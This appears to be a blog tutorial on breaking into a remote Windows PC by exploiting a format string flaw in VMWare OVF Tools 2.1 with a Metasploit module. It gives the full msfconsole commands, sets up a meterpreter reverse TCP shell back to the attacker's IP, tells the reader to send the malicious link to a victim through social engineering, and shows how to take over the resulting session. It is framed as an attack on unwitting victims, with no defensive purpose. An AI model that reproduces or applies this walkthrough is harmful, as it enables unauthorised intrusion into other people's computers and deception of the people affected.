Hack Remote Windows PC using VMWare OVF Tools Format String Vulnerability

This module exploits format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Exploit Targets

VMWare OVF Tools 2.1

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP SP 2

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ovftool_format_string

msf exploit (ovftool_format_string)>set payload windows/meterpreter/reverse_tcp

msf exploit (ovftool_format_string)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (ovftool_format_string)>set srvhost 192.168.1.6 (This must be an address on the local machine)

msf exploit (ovftool_format_string)>set uripath / (The Url to use for this exploit)

msf exploit (ovftool_format_string)>exploit

Now an URL you should give to your victim http://192.168.1.6:8080/ via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *